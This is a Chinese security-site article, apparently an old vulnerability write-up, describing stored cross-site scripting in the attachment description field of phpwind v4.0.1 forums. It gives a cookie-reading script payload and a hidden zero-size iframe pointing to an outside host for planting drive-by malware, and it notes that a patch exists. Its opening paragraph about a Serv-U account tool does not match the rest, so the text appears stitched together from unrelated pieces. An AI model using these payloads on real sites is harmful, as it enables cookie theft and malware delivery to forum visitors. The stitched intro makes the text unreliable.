简介:前段时间动网漏洞在网上闹得沸沸扬扬,ASP木马在网上到处泛滥。那么怎么利用ASP木马来渗透服务器呢?在下左思右想,在高人的指点下完成能在WEB SHELL或是CMD SHELL能模拟SERV-U管理员向SERV-U添加、删除任意帐号的工具chobits2.0,此为一个仅32K大小的软件,不要看他这么小,却能像SERV-U管理员一样能向SERV-U添加和删除FTP帐号
文章作者:E.T
信息来源:开门芝麻
漏洞程度:高危
漏洞程序:phpwind v4.0.1最新免费版
漏洞描述:利用phpwind v4.0.1论坛的发贴附件上传中的附件描述处插入任意代码!
漏洞利用:
在phpwind v4.0.1发贴/回贴的附件上传处,有个附件描述,在此处插入脚本代码,比如插入:
以下是代码片段:
<script>alert(document.cookie)</script>
点击提交,发贴/回贴成功后,浏览该贴就会执行插入的代码,没有做过滤,此代码的作用是获取用户的COOKIE信息.看你怎么利用了,代码可以自己构造其它的,经测试,引号是被php过滤了的.结果如图2:
从上图查看源文件可以看出,所插入的代码原样呆在附件描述处,没做过滤!
浏览刚发/回的贴子,结果如下图3:
当然也可以插入框架脚本代码,即我们常说的挂马代码,如: 以下是代码片段:
<iframe src=http://gingelly.xinwen365.com/index1.htm width=0 height=0>
结果也不用说啦!
官方对此漏洞已出补丁,请有此论坛的用户及时更新。 
安全中国首页 > 文章中心 > Phpwind文章